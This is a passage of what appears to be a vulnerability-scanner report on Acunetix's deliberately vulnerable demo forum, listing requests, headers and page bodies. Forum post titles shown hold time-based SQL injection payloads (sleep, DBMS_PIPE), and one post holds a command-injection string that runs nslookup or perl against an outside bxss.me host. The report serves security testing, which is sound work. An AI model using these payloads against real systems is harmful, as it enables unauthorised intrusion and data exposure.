class='posttitle'>Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=55 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4210 |
Response Body - size: 4,210 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum if(now()=sysdate(),sleep(15),0) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/if(now()=sysdate(),sleep(15),0) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:59 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>if(now()=sysdate(),sleep(15),0) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=56 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4246 |
Response Body - size: 4,246 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=57 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4246 |
Response Body - size: 4,246 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:22 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=58 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4468 |
Response Body - size: 4,468 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:23 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=59 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1'" </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1'" </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:38 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1'" - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4317 |
Response Body - size: 4,317 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>&(nslookup hitgvavrmebey35980.bxss.me||perl -e "gethostbyname('hitgvavrmebey35980.bxss.me')")&'\"`0&(nslookup hitgvavrmebey35980.bxss.me||perl -e "gethostbyname('hitgvavrmebey35980.bxss.me')")&`'</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=60 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4120 |
Response Body - size: 4,120 bytes. |
